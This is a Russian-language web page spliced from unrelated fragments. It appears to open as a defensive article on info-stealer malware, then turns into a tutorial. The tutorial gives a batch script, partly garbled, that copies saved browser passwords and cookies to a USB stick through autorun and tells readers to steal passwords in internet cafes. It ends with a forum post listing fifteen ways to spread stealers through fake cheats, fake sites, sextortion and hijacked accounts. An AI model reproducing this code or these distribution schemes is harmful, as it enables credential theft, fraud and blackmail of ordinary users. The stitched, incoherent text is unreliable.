Как сделать вирусы стиллер


Дата публикации: 03.01.2019 2019-01-03

Статья просмотрена: 1159 раз

Ключевые слова: вредоносный вирус, способ защиты, электронный ресурс, зараженный компьютер, Интернет.

Компьютерный вирус — это программа, способная создавать свои копии, внедрять их в различные объекты или ресурсы компьютерных систем, сетей и производить определенные действия без ведома пользователя.

Свое название компьютерный вирус получил за некоторое сходство с биологическим вирусом (например, в зараженной программе самовоспроизводится другая программа — вирус, а инфицированная программа может длительное время работать без ошибок, как в стадии инкубации).

Программа, внутри которой находится вирус, называется зараженной программой.

Когда инфицированная программа начинает работу, то сначала управление получает вирус. Вирус заражает другие программы, а также выполняет запланированные деструктивные действия. Для маскировки своих действий вирус активизируется не всегда, а лишь при выполнении определенных условий (истечение некоторого времени, выполнение определенного числа операций, наступления некоторой даты или дня недели и т. д.). [1]

После того как вирус выполнит нужные ему действия, он передает управление той программе, в которой он находится. Внешне зараженная программа может работать так же, как и обычная программа [2].

В мире распространяются тысячи самых различных вирусов, однако не все из них широко известны. Вирус становится известен только тогда, когда причиненный им ущерб достигнет определенной денежной величины. Несколько лет назад в Интернете начали появляться вирусы, разрушительные последствия которых исчислялись миллиардами долларов. Так образовался клуб вирусов-миллиардеров, в котором на данный момент их насчитывается около десятка. Все из них нанесли ущерб мировой экономике больше, чем на 1 млрд. долларов [3].

Методы исследования: поисковый, анализа и синтеза, обобщения и систематизации полученных данных.

Практическая значимость исследования определяется возможностью использования материалов данной работы для защиты персонального компьютера (далее по тексту — ПК), мобильных телефонов и других устройств, которые работают с помощью сети интернет с целью их защиты их от вредоносных вирусов.

Info stealers могут использовать множество методов сбора данных. Наиболее распространенными из них являются:

– зависание браузеров (а иногда и других приложений) и кражи учетных данных, которые набираются пользователем;

– использование скриптов веб-инъекций, которые добавляют дополнительные поля в веб-формы и отправляют информацию от них на сервер, принадлежащий злоумышленнику;

– захват формы (поиск определенных открытых окон и похищение их содержимого);

– с помощью раскладки клавиатуры;

– кражи паролей, сохраненных в системе, и файлов cookie.

Современные похитители обычно являются частями бот-сетей.

Иногда цель атаки и связанные с ней события, настраиваются удаленно командой, отправленной с сервера Command and Control (C & C).

Возраст похитителей информации начался с выпуска ZeuS в 2006 году. Это был продвинутый троян, ориентированный на учетные данные онлайн-банковских услуг. После того, как код ZeuS просочился, многие его производные начали появляться и популяризировать этот тип вредоносного ПО.

В настоящее время у большинства агентов ботнета есть некоторые особенности кражи информации, даже если это не главная их цель.

Информация похитителей обычно связана со следующими типами вредоносных программ, таких как:

– Загружатели / Trojan Droppers — вирус инфекционного компьютера, который подтверждает себя на помеченном компьютере, используя преимущества ненадежных параметров безопасности и незащищенной сети.

– Троян — вредоносная компьютерная программа, которая используется для заражения системы целевого компьютера, и приводит к вредоносной активности на нем. Как правило, такие программы используются для похищения личной информации, распространения других вирусов или просто нарушения производительности компьютера. Кроме того, хакеры могут использовать их для получения несанкционированного удаленного доступа к зараженным компьютерам, заражения файлов, и повреждения системы. Как только троянский конь попадает в компьютер, он начинает скрываться от жертвы. Трояны очень похожи на обычные вирусы, поэтому, их довольно трудно обнаружить.

– Ботнет — компьютерная сеть. состостоящая из некоторого количества хостов с запущенными ботами — автономным программным обеспечением. Чаще всего бот в составе ботнета является программой, скрытно устанавливаемой на устройство жертвы и позволяющей злоумышленнику выполнять некие действия с использованием ресурсов заряженного компьютера. Обычно используются для нелегальной или неодобряемой деятельности — рассылки спама, перебора паролей на удалённой системе, атак на отказ в обслуживании (DoS- и DDoS-атаки). Боты, как таковые, не являются вирусами. Они представляют собой набор программного обеспечения, который может состоять из вирусов, брандмауэров, программ для удаленного управления компьютером. А также инструментов для скрытия от операционной системы.

Они представлены семействами вредоносных программ, такими как:

– Зевс — троянская программа нового типа, разработана группой хакеров в 2007 году, и предназначенная для атаки серверов и перехвата данных. Ущерб от данной троянской программы огромный.

– Tinba — разрушает важные системные файлы, которые гарантируют бесперебойное функционирование ПК и препятствуют нормальной работе устройства. Он отключает работу всех установленных мер безопасности, включая антивирусные инструменты и брандмауэры Windows, и открывает бэкдоры для других интернет-угроз.

– Ботнет Нейтрино — компьютерная сеть, состоящая из некоторого количества хостов с запущенными ботами — автономным программным обеспечением. Чаще всего бот в составе ботнета является программой, скрытно устанавливаемой на устройство жертвы и позволяющей злоумышленнику выполнять некие действия с использованием ресурсов заражённого компьютера.

Значение вредоносных программных обеспечений

Раннее обнаружение имеет решающее значение для этих видов вредоносного ПО. Любая задержка в обнаружении этой угрозы может привести к тому, что важные учетные записи будут скомпрометированы.

Последствия очень серьезны для похищенных паролей, так как информация похитителей опасна для всех пользователей зараженной машины. Поэтому очень важно иметь защиту от вредоносных программ хорошего качества, которая не позволит установить вредоносное ПО.

Последствия от вредоносных стиллеров влекут за собой:

– утечку конфиденциальной информации;

– похищение денежных средств со счетов как граждан, так и банков и их перевод на счета похитителей.

Украденные учетные записи электронной почты могут использоваться в серверном направлении для отправки спама, а украденная учетная запись SSH может использоваться как прокси-сервер для атак, совершаемых кибер-преступниками.

Прежде всего, следует взять за привычку, соблюдать безопасность при посещении веб-сайтов и не открывать неизвестные вложения. Однако в некоторых случаях этого недостаточно. Наборы наложения могут все же устанавливать вредоносное ПО на уязвимую машину, даже без какого-либо взаимодействия. Именно поэтому важно иметь качественное антивирусное ПО.

– во-первых, его не видят антивирусы;

– во-вторых, этот stealer написан на java поэтому для его работы у жертвы должно быть установлено соответствующие ПО (java runtime). Все действия будут выполняться на операционной системе kalilinux.





Так как Стиллер скомпилировался в формате java нам предлагают создать exe файл, жмём Y.


Затем нужно скрыть стиллер, например, использовать метод bad USB или внедрить его в программу. В дальнейшем если жертва откроет программу, стиллер начнёт действовать самостоятельно.


Во-первых, никогда не следует открывать файлы из ненадёжных источников.

Во-вторых, следует установить хороший антивирус, но и он не всегда может помочь.

Скрипт деактивации стиллера:


В-четвёртых, если пользователь все-таки подозревает, что компьютер заражен кражей информации, он должен выполнить полную проверку системы с помощью автоматических средств защиты от вредоносных программ. Удаление вредоносного ПО недостаточно. Крайне важно немедленно изменить все пароли.

Стиллер паролей для браузеров на Windows


Сегодня мы поговорим о том, как создать стиллер паролей для браузеров, которые работают под операционной системой Windows. Он будет работать быстро и точно, а самое главное, что на него не будут ругаться антивирусы. Писать стиллер паролей мы будет в обычном блокноте, в конце сохраним его как .bat. У нас уже есть статья, где мы говорили о создании шуточных вирусов – читать.

Стиллер паролей – определенный класс вирусов, функционал которых состоит в том, чтобы украсть сохраненные пароли с компьютера и отправить их “автору”.

Метод, который мы будем использовать имеет как плюсы, так и минусы, без этого никуда.

  • Не ругается антивирус;
  • Скорость работы;
  • Простота в доработке;
  • Возможность мгновенного запуска;
  • Портативность.

  • Autorun не работает на Windows 8+;
  • Постоянное созданиеудаление autorun.inf;
  • Личное присутствие;
  • Только для Windows.

Стиллер паролей для браузеров на Windows | Разбор плюсов и минусов


Давайте разберемся, почему такие плюсы и минусы имеет наш стиллер паролей для браузеров.

Думаю первые пару пунктов в разборе не нуждаются, а вот простота в доработке, давайте посмотрим почему.

Ниже будет код программы, там видно, что стиллер крадет пароли из 3 браузеров, Opera, Mozilla, Chrome. Если вы захотите сделать его более объемным и добавить все браузеры, то вам нужно просто найти их директории и прописать пути.

Далее мгновенный запуск. Создаём файл autorun.inf и добавляем наш anyname.bat туда. Как только вы вставите флешку в ПК, произойдёт кража и её можно сразу вытаскивать. Это займет у секунду времени, однако тут сразу и минус. Autorun.inf не запускается на Windows 8+, так что придётся запускать батник вручную. Точнее сказать, автоматический запуск стал невозможен с последнего обновления безопасности Windows 7.

Постоянное созданиеудаление autorun.inf – если вы вставите флешку в ПК, а потом пойдёте домой и у вас Windows 8.1 или ниже, то пароли обновятся из-за авторана. Чтобы этого избежать его нужно постоянно удалять, однако в нашем скрипте уже всё есть. Он будет удален автоматически после запуска.

Создаём стиллер паролей для браузеров


Для того, чтобы создать портативный стиллер паролей для браузеров нам понадобится только блокнот.

Создаём текстовый документ и пишем туда следующий код:

d0Google
CD/D %APPDATA%OperaOpera
copy /y wand.dat %

d0Opera
copy /y coockies.dat %

d0Opera
cd %AppData%MozillaFirefoxProfiles*.def-ault
copy /y coockies.sqlite %

d0Mozilla
copy /y key3.db %

d0Mozilla
copy /y signons.sqlite %

d0Mozilla
copy /y AppData%MozillaFirefoxProfiles*.def-ault %

d0Mozilla
cd %localappdata%GoogleChromeUser DataDefault
copy /y “%localappdata%GoogleChromeUser DataDefaultLogin Data” “%

d0/Google”
ATTRIB -R -A -S -H
attrib +h %

Вы же можете его просто скопировать, сохраняем файл как anyname.bat. В коде видно, что сохраняются пароли из Mozilla, Opera, Chrome. Если вы хотите добавить ещё браузеры, требуется найти их директории и таким же образом добавить. Атрибуты, которые мы присвоили делают созданные папки скрытыми, чтобы никто ничего не заподозрил.

Теперь нужно создать файл autorun.inf со следующей командой:

Готово, теперь можете идти куда душа пожелает и воровать пароли, например в интернет-кафе или тому подобные места. Наш стиллер паролей для браузеров не является удалённым, из-за чего придётся ходить.

Открыть сохраненные пароли можно заменив краденые файлы cookies, базы данных и данные логина. Для удобства можно воспользоваться программой Password Web Views.

Сегодня мы поговорили о том, как создать стиллер паролей для браузеров, обсудили плюсы и минусы такого скрипта. Если вам понравилась статья, подписывайтесь на обновления сайта, а также наш Telegram.


  • Для жителей Москвы и МО - +7 (499) Доб. 448
  • Санкт-Петербург и Лен. область - +7 (812) Доб. 773

Всем привет соглашусь, что изобретаю велосипед, но хочется сделать все своими ручками не прибегая к open source и т. Хочу, чтобы меня поставили на иснниный путь. Итак, цель - написание трояна, а именно кейлоггера для получения пароля от vk. Вирус Код написанный. Вирус для кражи паролей. Вирус в блокноте.

Троянцы увидели коня и, подумав, что это подарок от греков, затащили коня в город, не догадываясь, что внутри пустого деревянного коня сидели лучшие греческие солдаты. Под покровом ночи солдаты выбрались наружу, открыли ворота города и позже вместе с оставшейся армией перебили всю троянскую армию.

Вариант 1. В этой статье мы рассмотрим один из способов предотвращения кражи паролей, в случае если пользователь случайно запустил троянскую программу.

Как сделать троян который будет воровать информацию

Некоторые из этих вирусов могут работать не только в среде Windows 3. Linux - вредоносные программы, действующие в среде Linux.

Это быстро и бесплатно! Деструктивные троянские программы есть и такие — напр. Первая группа — Mail Sender — наиболее распространена, так как подавляющее большинство троянов, если не все, отсылают хозяину пароли от Интернета, вашей электронной почты, ICQ, чатов, ну, и т.

BOK скачивается на компьютер жертвы при посещении определенного сайта и пытается украсть пароли от определенных банковских сайтов , Bancos. LU сохраняет пароли во временных файлах, а затем пытается отослать их хозяину , Banker. XP собирает конфиденциальные данные, пароли, счета и т. Такой троян ждет соединения со стороны клиента соединение осуществляется через какой-либо порт , с помощью которого посылаются команды на сервер.

Созданный группой хакеров Cult of Dead Cow, он, несмотря на аскетичный интерфейс, позволяет постороннему по локальной сети или Internet получить возможность полного контроля над вашим компьютером, полного доступа к вашим дискам, наблюдения за содержимым экрана в реальном времени, записи с подключенного к системе микрофона или видеокамеры и т. Программы-дозвонщики отличаются тем, что могут нанести жертве значительный финансовый урон, устанавливая соединение с зарубежным интернет-провайдером.

Таким образом, с телефонного номера абонента происходит установление "незаказанного" международного соединения, например, с островами Кука, Сьерра-Леоне, Диего-Гарсиа или другим диковинным регионом в зависимости от чувства юмора создавшего программу.

Trojan- PSW. DUT или trojan. DialUpPaper; not-a-virus: Они способны отслеживать нажатия клавиш клавиатуры и отсылать эту информацию злонамеренному пользователю. Это может осуществляться по почте или отправкой прямо на сервер, расположенный где-либо в глобальной сети. BadBoy; Backdoor. Серверная часть слушает определенный порт и, как только получает команды извне, начинает функционировать как нюкер Nuker — приложение, отсылающее на заданный IP шквал некорректно сформированных пакетов, что приводит к эффекту, известному как отказ в обслуживании.

Загрузчики — Downloader. Это троянские программы, загружающие из Интернета файлы без ведома пользователя. Загружаемое может быть как интернет-страницами нецензурного содержания, так и просто вредоносным ПО. Размер зараженных файлов существенно варьируется. Троянская программа Trojan-Downloader. Упакована FSG. Размер распакованного файла — около 33 Кб. Дропперы Dropper — Троянские программы, созданные для скрытной установки в систему других троянских программ.

Proxy-серверы — троян устанавливает в вашу систему один из нескольких proxy-серверов socks, HTTP и т. Как подхватить заразу? Способы заражения не новы, но именно они и являются воротами для нечисти в ваш ПК… Через Internet самый обычный способ — когда юзер качает из нета проги.

Очень часто под безобидным ускорителем браузера может сидеть троян. С помощью всеми нами любимого "мыла"- самый распространенный способ заражения. Несмотря на многочисленные предупреждения, прогрессирует благодаря методам социальной инженерии. Прикрепленный файл, даже если он выглядит как картинка, может быть удачно замаскированной троянской программой. Через дискету или CD-диск. Довольно распространенный способ заражения. По статистике юзеры проверяют дискеты чаще, чем диски, если не сказать более: CD-диски обычно не проверяют вообще.

А зря… Ведь именно пиратские диски никто не будет отрицать, что таких у нас большинство — не самое слабое звено в канале распространения деструктивных программ.

Изобретательность вирусописателей не знает границ. Сам лично поймал "на живца" следующего зверя — "Trojan horse. Разобраться в таких случаях бывает нелегко. Правильность заключения можно проверить, лишь дезассемблировав такую программу. Довольно оригинальный способ заражения — через autorun при вставке диска в дисковод. Как вы уже догадались, autorun. Найти и обезвредить! Если ваш антивирус упорно молчит, а возможность присутствия трояна высока, то попробуйте обнаружить шпиона, воспользовавшись специальными утилитами типа Trojan Remover и т.

Как показывает практика, этот способ доступен даже самому неопытному пользователю ПК, тем более, что соответствующего софта в Интернете более чем достаточно. Но об этом поговорим позже. А сейчас постараемся разобраться в том, как можно удалить троян вручную.

Для своего запуска троянская программа обычно прописываются на автозапуск в следующих ветвях реестра: Думаю, не грех лишний раз напомнить, что при работе с реестром следует придерживаться особой аккуратности.

Следует также просмотреть все, что прописано в автозагрузке. Для этого в консоли "выполнить" набираем msconfig, далее переходим на закладку "автозагрузка".

Просто убираем галочку с программы, вызывающей у вас сомнение, и ее запуск при следующей загрузке Винды блокируется. Советую вам внимательно следить за своими драйверами и программами, прописанными в автозагрузку — тогда у вас будет намного больше шансов моментально определить трояна.

Однако, даже если вы не обнаружили его в процессах диспетчера задач, огорчаться не стоит. Полную информацию о запущенных в Windows программах можно увидеть, запустив утилиту XRun или ей подобную — CTask. Если вышеизложенные способы ничего не дали, а признаки троянизации налицо слишком большой трафик, непонятные процессы в оперативной памяти, тормоза и глюки , то пришло, как говорят, время для плана Б. Необходимо просканировать ваш ПК извне на наличие открытых портов.

Все, что вам понадобится для такой операции — это хороший сканер портов и ваш IP. Данная процедура высокоэффективна, и с ее помощью выявляются даже самые скрытные и хитрые трояны. Из сканеров могу посоветовать X-Spider, который является лучшим сканером для подобных дел.

Если у вас открыты нестандартные порты, то есть о чем задуматься… и прикрыть это дело в настройках вашего брандмауэра. Когда ваша антивирусная программа находит какой-то вредоносный вирус,она пишет название. Обычным пользователям они нечего не говорят,чтобы вы все понимали,я ниже привел маленькую табличку: WinWin16W16 E-специальные вредоносные программы,поражающие битные исполняемые программы в операционной системе Windows.

Но они могут работать и в старых ОС. Для того чтоб написать подобный вирус,нужно знать точное место хранения тех файлов которые и будет он воровать, компоненты Blat которые можно скачать с офф сайта или же с нашего сервера,так же компонент от архиватора WinRaR Rar.

Открываем блокнот и копируем туда следующий код. Для того чтоб создать Вирус мы будем использывать флешку. Начнем создание Флешки-убийцы: Первым делом создаем три файла:. BIN , поэтому, на всякий случай, можете создать таким же методом и файл Nod32 например Спасибо большое, calc. И притом не на флешке изначально. А на машине, куда втыкаешь ее Он меня задолбал Это не вирусы-они системные это автозапуск и корзина Формат флешки не поможет, что ли?

А куда втыкал её - лечить! Сканер от доктора Веба, ссылка на скачку - CureIT - сканер от дрВеб работает без установки сканируй в безопасном режиме f8 У меня Nod32 не прочухал! Выручила программа Trojan Remover!

Воткнул флешку в компьютер знакомого. Она еще не хотела безопасно отключаться сообщение типа Windows не может остановить это устройство сейчас. Поможет ли в данном случае утилита Flash disinfector. Загрузочные вирусы Загрузочные вирусы заражают загрузочный boot сектор флоппи-диска и boot-сектор или Master Boot Record MBR винчестера. Принцип действия загрузочных вирусов основан на алгоритмах запуска операционной системы при включении или перезагрузке компьютера - после необходимых тестов установленного оборудования памяти, дисков и т.

В случае дискеты или компакт-диска управление получает boot-сектор, который анализирует таблицу параметров диска BPB - BIOS Parameter Block высчитывает адреса системных файлов операционной системы, считывает их в память и запускает на выполнение. SYS и IO. Сегодня мы вообразим себя злыми хакерами и займемся написанием настоящего вируса для андроид системы.

Мы подробно и с примерами расскажем о основных этапах написания вируса для операционной системы андроид. Не лишним будет напомнить, что эта статья предназначена только для удовлетворения вашего исследовательского интереса. История компьютерных вирусов — от древности до наших дней 1. Немного археологии Мнений по поводу даты рождения первого компьютерного вируса очень много. Мне доподлинно известно только одно:.

Overwriting Данный метод заражения является наиболее простым: Естественно, что при этом файл перестает работать и не восстанавливается. Такие вирусы очень быстро обнаруживают себя, так как операционная система и приложения довольно быстро перестают работать.

Parasitic К паразитическим относятся все файловые вирусы, которые при распространении своих копий обязательно изменяют содержимое файлов, оставляя сами файлы при этом полностью или частично работоспособными. Основными типами таких вирусов являются вирусы, записывающиеся в начало файлов prepending , в конец файлов appending и в середину файлов inserting.

В свою очередь, внедрение вирусов в середину файлов происходит различными методами — путем переноса части файла в его конец или копирования своего кода в заведомо неиспользуемые данные файла cavity-вирусы.

Троянская война

Честно сказать, даже не пытался; но, как известно, горькая правда лучше, чем сладкая ложь. Его я всегда уважал, даже советовал раньше коллегам и друзьям. Но этот случай меня просто убил. А в добавок подтвердил то, что в инете в последнее время говорят, что он значительно хуже стал. Больше никогда его ни где не поставлю! Тот же Avast!

Как сделать троянский вирус в блокноте

Switch to English регистрация. Телефон или email. Чужой компьютер. Самоучитель по созданию вирусов в блокноте итак, приступим. Вы решили заняться вирусо-писательством. Сразу вам скажу, что эти вирусы, конечно, могут очень сильно навредить компьютеру, но полноценно передаваться с одного компьютера на другой они не могут. За все, что произойдет с вашим компьютером отвечаете вы и только вы.

Как создать вирус удаленного доступа | How to create a remote access virus

ПОСМОТРИТЕ ВИДЕО ПО ТЕМЕ: Делаем безвредный стиллер - Воруем пароли

Бат вирус ворующий пароли

Что творит в системе или деструктивная активность После запуска файла mvk. Если ввести любой ID и нажать кнопку, то появляется сообщение, что не возможно получить данные, так как уязвимость контакта уже закрыли. В добавок трой изменяет ключ запуска проводника в реестре. И файл hosts. Как лечить Загрузиться в безопасном режиме жать F8 после включения компа. Угадайте, что сделает эта программа?

Сегодня мы вообразим себя злыми хакерами и займемся написанием настоящего вируса для андроид системы.

Некоторые из этих вирусов могут работать не только в среде Windows 3. Linux - вредоносные программы, действующие в среде Linux.

Батник ворующий пароли

Выражение " троянский конь " предполагает что то, что на первый взор смотрится полностью традиционно и безвинно, но, на самом деле, может наделать урон. Троянский вирус или ещё его именуют Троян файл, который смотрится полностью безопасно, но, на самом деле, представляет опасность. Хотя они и возникли сравнительно нетакдавно, они уже упрочнились в нашей жизни и собственной славой превзошли древесного троянского коня из далёкого прошедшего. Далее мы опишем некие из видов троянских вирусов, с которыми разрешено встретиться. Первый троянский вирус, который мы обсудим, вступает в категорию " ловушка ". Он втомжедухе наиболее популярен под заглавием spysheriff, и уже успел заразить миллионы компьютерных систем по всему миру. Этот троянский вирус классифицируется как malware зловредное программное снабжение. Он не воздействует на компьютерную систему и не мешает ей ущерба, но он принуждает возникать каждые нудные всплывающие окна.

Как создать троян ворующий пароли

Android принято называть рассадником вредоносных программ. Каждый день здесь выявляют более 8 тысяч новых образцов вирусов. И эти цифры постоянно растут. Но задумывались ли вы, как эти вредоносные программы работают? Сегодня мы разберемся с этим, изучив приложение для Android, способное собирать информацию об устройстве, его местоположении, делать фотографии и записывать аудио.

Батник для угона паролей

Если Вам необходима помощь справочно-правового характера у Вас сложный случай, и Вы не знаете как оформить документы, в МФЦ необоснованно требуют дополнительные бумаги и справки или вовсе отказывают , то мы предлагаем бесплатную юридическую консультацию:. Банковский троян Trickbot впервые за почти два года вернулся в первую десятку рейтинга. Универсальные банковские трояны, такие как Trickbot, популярны среди киберпреступников , так как позволяют получить максимальную прибыль. Trickbot нацелен преимущественно на банки, но отдельные пользователи также могут с ним столкнуться.


Решил поделиться всеми собранными методами распространения своего вирусняка, будь то стиллер, майнер,ботнет, клиппер, шифровальщик и т.д. Большинство способов собраны не из пабликов, а из собственного опыта, хоть и лежат на поверхности. Я работал со стиллером, но фактически способы распространения работают для всего.

Для начала сразу уточню: малварь- с английского "malware", в переводе "вредоносная программа", в данном случае это то, что мы собираемся распространять.

МОТИВАЦИЯ:

Сразу начну с того, что, если ты новичок, то нужно постоянно прощупывать интересный тебе способ распространения, тысячи инсталлов не придут к тебе в первые часы работы, но они обязательно будут, если ты будешь усердно работать. Вообще, это залог любого успеха, нужно постоянно думать, пахать, опыт вместе с успехом приходит с практикой и ошибками, не надо забрасывать дело после пары ошибок, потому что, сделав одну ошибку, ты её уже не совершишь, а значит ты уже стал опытнее в своём ремесле.

Не буду томить, перейду сразу к сути, а именно к 15 способам распространения твоего малваря.

1. Начну с самого простого - это распространение на различных буксах. Буксы- сайты, в которых сотни людей выполняют любые задания за копейки. Пример букса, с которым работал я : Seosprint.net(Не реклама). Всё предельно просто, мы размещаем задание в категории по типу "Скачай и установи файл" с заданием, в котором говорим о том, что мы "начинающий программист" и тестируете свою программу на разных системах, поэтому вам и нужен её запуск.

Файл лучше всего заливать в архив и ставить пароль, затем заливать на Яндекс Диск и давать пароль в задании либо указывать его в названии архива. Именно таким способом жертв намного больше, так как мамонты доверяют Яндексу, все наслышаны про то, что в нём не может быть вирусов, это правда, но, блять, запороленный архив даже VirusTotal пропустит с 0/67.

В моём случае в день абсолютно пассивно приходило

10 жертв на мой стиллер, каждому за выполнение я платил рубль, который потом сам и выводил на свои кошельки. Конечно, целевая аудитория максимально нищенская, но часто попадались аккаунты с рефералами, которые я сам себе продавал(они приносят еще пассивного заработка), а также у некоторых на балансе по 600 рублей бывает, которые, при наличии почты, я также выводил на свои кошельки.

В общем, метод самый легкий, пассивный, требует лишь маленьких затрат

30 рублей для начала, которые обязательно окупятся в несколько раз, уверяю.

2. Спам по группам/лс вконтакте. Тут всё немного сложнее, но и инсталлов будет больше. В чём суть? Спамим различные группы вконтакте с открытыми комментариями или, еще лучше, с открытой стенкой, с надписью типа "Сливаю приватный чит CS:GO/Minecraft/Warface, пиздец как валит, уже месяц нет бана и не будет."

Текст должен быть максимально похожим на реальный, не надо писать заумных фраз, пиши так, будто ты сам этим интересуешься и захотел найти где-нибудь чит.

Распространять необязательно под видом чита, это может быть программа для накрутки Яндекс Дзен, антивирус, да всё, что угодно, главное составить красивую, небольшую легенду, чтобы челику захотелось перейти по ссылке и скачать твой файл.

Для парсинга групп рекомендую программу PosterPro, стоит 20 рублей в месяц, очень годная. Парсим группы, покупаем аккаунты вконтакте и спамим до усрачки, метод работает до сих пор, причём совсем неплохо.

3. Еще один способ с вконтакте. Для этого мы создаём типичную страницу бизнесмена, тщательно заполняем профиль, делаем красивую стеночку, накручиваем лайки, комментарии. Я прикидывался добывальщиком биткоинов, который каждый день выводит по пять косарей, скрины обязательно выставлять на стенке. Мы продаём нашу приватную программу для майнинга, которая приносит по 300 рублей в день на полном пассиве. В течение недели мы каждый день делаем новостной пост/отзыв клиента, в комментариях накручиваете слова благодарности. В последний день мы делаем пост"В честь того, что мою программу купили уже более 30 раз, вылаживаю ей в открытый доступ. Через недельку удалю пост, успейте заработать на чистом пассиве." В комментариях создаём активность.

Пример:

Виктор- у меня всего за день 43 рубля вышло, надеюсь завтра лучше будет.

Елена- А у меня почему-то не работает, хз что не так сделала, говно а не программа

Надя- Елена, тебе же прямо в нос тыкнули хорошей прогой, сама за день 600 подняла, господи, какие же тупые и ленивые люди существуют.

Вася- Всё норм, на вывел уже 230 рублей, за ночь еще думаю будет столько же, спасибо.

Всё, льём трафик посредством рекламы на свою страничку/любым другим способом и собираем живые инсталлы, а также делаем свою страничку популярнее, как правило, чем дальше, тем лучше.

4. Спам по ютубу, при хорошей работе может принести много инсталлов, причём очень полезных. Как пример, комментарии под видео майнинг тематики, обзоры различных читов. Просто таким же макаром с левых аккаунтов спамим в комментариях, накручиваем с других аккаунтов себе лайки, комментарии, дизлайкаем остальных. Если уделять этому много времени, то выйдет неплохое кол-во инсталлов.

Сам этим способом пользовался лишь раз, за пол часа работы

7 очень годных инсталлов было, думаю, понятно, что будет, если работать весь день.

5. Фейк-сайт, один из самых профитных способов распространения малваря. Создавать легче всего на базе WordPress, а еще легче скачать/купить готовый скрипт. На соседнем борде видел продажник одностраничника с программой для Яндекс Дзена, вставить туда только свою ссылку на скачивание, закупить рекламу на каком-то канале с подходящей ЦА и грести инсталлы.Минусы: затраты на рекламу.

6. Анонимные чаты. Я думаю, все про них слышали, так вот, в них можно нехило так продвинуть малварь. Отечественные аналоги защищены от спама, но в ЮСА до сих пор хуева туча анонимных чатов, которые беззащитны в этом плане, мы просто спамим очередную легенду. На таких сайтах дохуя дрочеров, поэтому легче продвигать что-то типа "Сфоткал свою сестрёнку пока та спала, как тебе? Ссылка". Очень много потенциальных жертв, надо лишь прощупать ЦА и ебашить спамом, можно использовать различные программы, записывающие движения мыши(гуглите), чтобы оставить компьютер с записанным скриптом на ночь, а под утро разбирать нужные инсталлы. Внимание, чекайте, если ссылки отображаются у тех, кому вы пишите. Ненавязчиво спросите у собеседника, видна ли ему ссылка гугл.ком, потому что иногда ты даже не замечаешь, но твоему собеседнику не видна твоя ссылка, тогда весь спам пойдет насмарку.

7. Отбитые люди в группах "Отдам даром". Тут всё просто, парсим тем же PosterPro репостнувших пост розыгрыша айфона, копируем страничку админа и с нескольких фейков пишем людям, что они победили, осталось заполнить форму в специальном приложении. Поверьте, люди там пиздец отбитые, будут устанавливать всё, лишь бы получить свой заветный айфон. Совет, не рассылайте с одного аккаунта больше 24 сообщений в день, очень высок риск того, что его заморозят/забанят.

8. Телеграмм чаты. Спамим по тематическим чатам в телеграмме, предлагая то, что им интересно. То есть, если чат "Майнинг", то не надо втюхивать читы для майнкрафта, думаю, это ясно. Чаты в телеграмме можно найти в открытом доступе, трафик достаточно хороший. Пример: 1000 человек увидит вашу ссылку с придуманной легендой, 200 человек вчитается и заинтересуется, запустит человек 10-15. Неплохо, да? Для одного то поста в одном чате. Эту схему я не проверял на собственном опыте, но, думаю, в нужных руках будет работать нихуево, особенно если есть понимание ЦА.

9. Толкаем реальную схему заработка. Всё выглядит примерно так: создаём какую-нибудь схему заработка(берём из неочевидного паблика), объявляем набор в группу тех, кто собирается работать по схеме, которая якобы принесёт профит, объясняю, как это происходит. Через недельку на своей страничке выкладываем ту самую схему, накручиваем комменты, лайки, репосты, делаем всё правдоподобно. Затем покупаем рекламу у ютубера, мол выложил схему заработка, можешь сам почитать, просто пропиарь мою страничку, пусть люди увидят. Канал по типу "Заработок в интернете" пиарит вашу страничку, прочитав схему заработка и люди в бешеном кол-ве качают её. В чём прикол? В том, что в папках архива со схемой есть уже ваш малварь, который каждый чел запустит либо случайно, потому что тот имеет иконку папки, документа, либо потому что так указано в схеме заработка, которую он прочитал. Профит тут очевиден.

10. Распространение в браузерных играх, где много школоты. Находим любой форум браузерной игры(вспомни, в какие браузерные игрушки ты играл в детстве) и создаём конкурс, связанный с этой игрой. Пишем в блокноте какую-то сложную задачку, связанную косвенно с самой игрой, и объявляем конкурс, победителю "200 рублей", склеиваем ваш малварь с текстовым документом, на малварь ставим иконку текстового файла. Школьники ринутся решать задачку, если нулёвый фуд, то никто долго не будет подозревать, что вы кинули вирус, тем более ответы на вашу задачу начнут появляться, а значит и подогревать интерес общественности.

11. Развод на сайтах знакомств. Всё просто, общаемся с жертвой, после того, как он захочет увидеть тебя в более обнаженном свете, кидаем архив с фотографиями, одна из которых является лишь вашим малварём с иконкой фотографии. Если у вас стиллер/ботнет, получаем его логи, находим реальную страничку и шантажируем. Профит тоже очевиден.

12. Играем на чувствах. Заполняем аккаунт красивой девушки, делаем всё правдоподобно, ждём недельку, чтобы аккаунт отстоялся, набиваем посты, накручиваем и т.д. Парсим мужчин от 35-40 и до 60, выбираем из них тех, у кого в статусе "отношения" замужем за кем-то. Пишем его жене с таким сообщением "Пиздец, как можно так не следить за своим мужиком. Пока ты хуйнёй страдаешь, я с твоим каждую неделю в кровати куралесю, даже видео сняли"ссылка", не советую смотреть для твоей же психики." Интересный способ, у большинства сыграет любопытство, а значит мы действуем правильно.

13. Теневые форумы. Создаём новую тему по типу "Солью схему заработка, продавали на соседнем борде за 8000 рублей, все вопросы в телегу @abababa". Ждём наплыва жертв, кидаем им склеенный с документом малварь. Работая со стиллером, получаем их логи и с их же страниц создаём похожие темы, накручиваем на свой пост положительные комментарии, жертв становится в разы больше, так до бесконечности, пока не забанят всех, кто запустил ваш софт.

14. Самый профитный, как показал опыт и практика. Способ рабочий на 100%, проворачивал сам, за пол часа работы был профит со стиллера

15. Более сложный, чем предыдущий, но более профитный. Уникальная хуйня. Делаем примерно всё то же, что и в прошлой схеме, но перед этим брутим аккаунты майнинг-форума. Где заказать такие услуги говорить не буду. Получаем из 100 брученных аккаунтов парочку с хорошей репутацией, возможно, модератора. От лица самого популярного из полученных размещаем тот же пост, обязательно криптуем ваш малварь( снижаем детекты), склеиваем его с реальным софтом. Заходим с других аккаунтов с репой, оставляем положительные отзывы, лайкаем, выводим в топ тему. Если был хороший крипт, то никто и не догадается через день -два, что там был малварь. Профит просто пиздец с такой темы, файл может установить

150 человек, каждый из которых имеет какой-то блокчейн кошелёк, с которого не составит труда вывести деньги при наличии стиллера. Затраты тут только на брут, нужно найти подходящего человека, который способен сбрутить аккаунты.

Ну вот и всё, прочитайте еще раз мотивацию и начните уже действовать, способы реально рабочие.

